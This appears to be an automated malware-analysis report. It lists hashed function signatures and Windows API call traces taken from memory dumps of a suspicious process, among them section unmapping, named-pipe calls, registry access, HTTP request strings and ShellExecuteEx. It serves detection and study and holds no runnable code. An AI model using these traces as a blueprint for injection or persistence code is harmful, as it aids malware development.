  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
